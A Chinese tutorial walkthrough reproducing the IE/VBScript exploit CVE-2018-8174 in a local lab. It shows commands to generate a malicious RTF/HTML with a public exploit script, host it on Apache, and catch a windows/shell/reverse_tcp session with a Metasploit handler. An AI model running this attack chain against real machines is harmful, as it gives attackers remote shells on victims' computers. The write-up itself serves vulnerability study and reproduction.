0DAY漏洞——CVE-2018-8174复现
注:
·本文所有演示均为本地虚拟环境,讲解只是为了读者更好地理解漏洞原理,以达到保护信息安全的目的,请勿用于非法用途!
·严禁利用本文中所提到的技术和漏洞进行非法攻击,否则后果自负,作者将不承担任何责任!
环境:kali , window7系统。
步骤:1.从github下载CVE-2018-8174文件。
git clone https://github.com/XXX/XXX
![](https://img-blog.csdnimg.cn/img_convert/d60e75149b92f82c2be7ceb655b84117.png)
2.进入到该文件中查看。
cd CVE-2018-8174_EXP-master
ls
![](https://img-blog.csdnimg.cn/img_convert/99d54769a6aa7adfd90008e9fd73a642.png)
3.生成恶意链接。
python2 CVE-2018-8174.py -u http://192.168.152.166/exploit.html -o zxs.rtf -i192.168.152.166 -p 4444
注意:CVE-2018-8174.py使用的python2版本的编写规则,如果使用python3会报错。建议大家使用python2。当提示successfully则表明已经成功。
![](https://img-blog.csdnimg.cn/img_convert/97bc1352f2a740f3c2537013fd781424.png)
4.可以看到此时已经生成相应的html文件。
![](https://img-blog.csdnimg.cn/img_convert/c566229f9d4376e0f740be9b143d2295.png)
5.将exploit.html部署到apache2中并启动该服务。
sudo cp exploit.html /var/www/html
cd /var/www/html
![](https://img-blog.csdnimg.cn/img_convert/bcf8daa99a9011eed5349e578bd5a6c0.png)
![](https://img-blog.csdnimg.cn/img_convert/ae49aa644f1a3122bbb94e0527419a40.png)
6.进入到msf中选择相应的exploit进行攻击。
msfconsole
![](https://img-blog.csdnimg.cn/img_convert/0d6867ae7f2d71f7d355f3344e9a0aee.png)
use exploit/multi/handler
![](https://img-blog.csdnimg.cn/img_convert/ca0c0a80a01fe16a746f495c955ff2f5.png)
7.设置相应的LHOST和LPORT以及payload。
set lhost 192.168.XXX.XXX
![](https://img-blog.csdnimg.cn/img_convert/d08b47a6ac3caf1dd69913c8d28e782f.png)
set lport XXXX
![](https://img-blog.csdnimg.cn/img_convert/12a5bd4203bbc8b75250f83d332c03b2.png)
set payload windows/shell/reverse_tcp
![](https://img-blog.csdnimg.cn/img_convert/64dc550dd3e61b31f6fa3d57b38fc566.png)
8.运行
run
![](https://img-blog.csdnimg.cn/img_convert/76ac1b9d65d256f8681fc5ce7fb59663.png)
9.在windows7中的ie浏览器打开之前设置的网址。
![](https://img-blog.csdnimg.cn/img_convert/71c94edc374925d05aa56a541cf6392e.png)
10.测试
![](https://img-blog.csdnimg.cn/img_convert/6b2d3ff4870405fafb50a141ccf0cc7f.png)